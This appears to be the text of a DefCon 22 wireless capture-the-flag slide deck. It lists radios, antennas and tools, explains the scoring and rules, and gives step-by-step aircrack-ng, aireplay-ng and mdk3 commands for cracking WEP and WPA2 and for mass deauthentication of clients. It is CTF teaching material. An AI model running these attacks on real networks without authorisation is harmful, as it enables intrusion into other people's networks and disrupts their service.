DefCon 22 WCTF Helpful Hints
DefCon 22 WCTF Helpful Hints
DefCon 22 WCTF Helpful Hints
Wireless Penetration
Testing
and
How to WCTF
RF Pentesting Platforms
Internet access
SmartPhone with USB tether (wifi/BT could be an issue)
External Radios/antennas
Internal radios might not give the flexibility/capability
Built in antennas may not give flexibility needed
Power-Supply
Enough outlets to power all of your gear
RF Pentesting Distributions
Linux
Pentoo
Kali-Linux
(bare metal, VM or overlay)
Windows
(bare metal or VM)
OS X with Fusion
Other Hosts with VM
RF Pentesting Radios
Ubertooth One
TP-Link TL-WN722N
RTL-SDR
Alfa Radios
EnGenius EUB 1200AC
Rokland N3
Rosewill N600 UBE
AirPcapNx
HackRF One
SR-71
WiSpy DBX
Antennas
Omnidirectional
2, 5, 7, 9 dBi
Directional
Panel
Yagi
Cantena
RF Pentesting Tools
PGP/GPG
aircrack-ng
airodump-ng
airdrop-ng
kismet-ng
wireshark
tcpdump
nmap
msf
gqrx
mdk3
multimon-ng
reaver
gnuradio
pyrit
osmocom
hashcat
wifite
fern-wifi-cracker
Smartnet-scanner
Cracking WEP
Lets do it!
Injecting packets
Now to inject
Cracking WEP
Terminal 1:
start logging:
airodump-ng --channel 1 --w /tmp
wlan1mon
This sets the channel to 1, and writes the
Aircrack data to files in /tmp.
Cracking WEP
Terminal 2:
aireplay-ng --fakeauth 5 -e VICTIM_SSID
wlan1mon
This performs a fake association every 5 seconds, to a
network named VICTIM_SSID (which is case sensitive!),
injecting via the wlan1mon interface.
Cracking WEP
Terminal 3:
Looking to find an ARP packet
Cracking WEP
Cracking WEP
Terminal 4:
aireplay-ng --deauth 15 -a MAC_OF_AP -c
MAC_OF_CLIENT wlan1mon
This sends 15 sets of 64 deauth packets, spoofing the
address of the access point (the BSSID the client is
connected to), targeting the client.
Make sure to pick a client which is connected to the network,
dont pick yourself!
Cracking WEP
Terminal 5:
aircrack-ng /tmp/aircrack-01.cap
If multiple SSIDs are present in the capture, select the target
SSID from the list. After a short time, it should have found a
solution.
RF Pentesting Tactics
Figure out the clues, and think hard. The clues are
always obscure and never direct, but will lead you to the
answer.
Make sure you have practiced with all setups in advance.
Have a process or sequential processes to get through
each challenge and follow that process!
Take really good notes, either on paper or in a text file.
I promise it will help.
Do your recon!!!
Cracking WPA2
Here we go!
radio #1
get the big picture
airmon-zc start wlanx
This gives the target network and clients associated
airodump-ng wlanx
Once you have identified the target hone in on target
airodump-ng wlanx -w <name of file date_channel_BSSID>
channel <channel of target> output-format pcap
manufacturer bssid <BSSID Addr> band <band of
target>
Deauth #1
radio #2
this will show many other client probes and flush out any
additional systems
airodump-ng wlanx -w pcap1.csv
airdrop-ng -i wlan5 -t test-01.csv -r rules (test-01.csv was
captured in an earlier session)
Then Deauth
airdrop-ng -i wlanxmon t pcap1.csv -r rules (rules file needs
to be created)
Deauth #2
OR
Better yet!
mdk3 wlanx d s 5 c 1,6,11 w <file name of MAC
addresses> (you must create this)
This will work 90% of the time, there are things that need to
be done when there at WIPS and WIDS
OR
Wait till the user leaves and follow them to a coffee shop
Recon is so important!
Karma
WiFi Pineapple
Custom Stuff
WCTF!
DefCon 22 WCTF
A Tribute to
and
How to WCTF
WCTF Rules
You must register with the scoring server (instructions to
follow)
All Game BSSIDs are in the context of AirHeadsWCTF#
Keys will only be scored once per team.
We log everything and obvious attempts will result in
subjective penalties
We are much meaner than you :-p
WCTF Scoring
In order to score, you must have
A working copy of GPG or PGP depending on your operating system
A valid Public/Private key pair to be used for signing your submissions
Access to email/internet (internet is provided AirHeadsWCTF01)
Setting up GPG/PGP
Verify that you have PGP or GPG
installed
Type gpg <return> and see if it is installed
if not:
emerge gpg (Gentoo)
apt-get install gpg (Kali, Ubuntu, Debian, etc.)
Download and install GPG Keychain Access
(OSX)
http://wctf.us/register.php
To Submit a Flag
Copy the flag from it's location.
It will be either the wireless encryption key
A string of random characters found on the target network
On a web server on the target network
(nmap can be your friend nmap p x.x.x.0/24
WCTF Tactics
Figure out the clues, and think hard. The clues are
always obscure and never direct, but will lead you to the
answer
Make sure you have practiced with all setups in advance
Have a process or sequential processes to get through
each challenge and follow that process!
Take really good notes, either on paper or in a text file, I
promise it will help
Learn about the person running the WCTF. This too will
give a lot away.
Words, Context, Formatting, and Capitalization are all part of the clues
TheX1le
Zero_Chaos
Terrible
Russ
DaKahuna
Dragorn
Questions
@Rmellendick
@boneheadsanon